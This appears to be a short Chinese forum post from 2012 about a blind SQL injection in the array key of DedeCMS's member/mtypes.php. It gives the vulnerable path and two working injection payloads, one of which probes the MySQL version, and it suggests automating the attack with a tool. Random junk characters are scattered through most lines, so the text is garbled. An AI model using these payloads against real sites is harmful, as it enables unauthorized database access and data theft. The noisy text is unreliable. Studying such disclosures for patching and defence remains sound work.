需要magic_quotes_gpc = Off,所以说是鸡肋啊.9 c7 `$ Y" B6 l
! l+ W4 n: g; }- K2 r0 c, _$ U7 d
' `+ a( L" k; X; O+ j& b; ?发生在数组key里的注射漏洞,有点意思.8 `6 ~' w4 C; g# I# L. r0 N e
$ ^, ]0 t' _. {; k这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
) ^, W& D# a3 v! H$ w6 D ( {: P& ^ v* L- q
http://www.xxx.com /dede/member/mtypes.php?dopost=save$ E% t6 k/ n# X3 y5 @/ `
7 N$ h+ Q0 T$ M: g/ \7 K0 |) b2 Y( ^
exploit:* R7 c5 \; R$ m8 _
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r/ K/ M$ U& w3 b3 x& i$ ?# T
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
3 l7 s, G8 o5 h# ] |
发表于 2012-12-20 08:08:09
收藏
支持
反对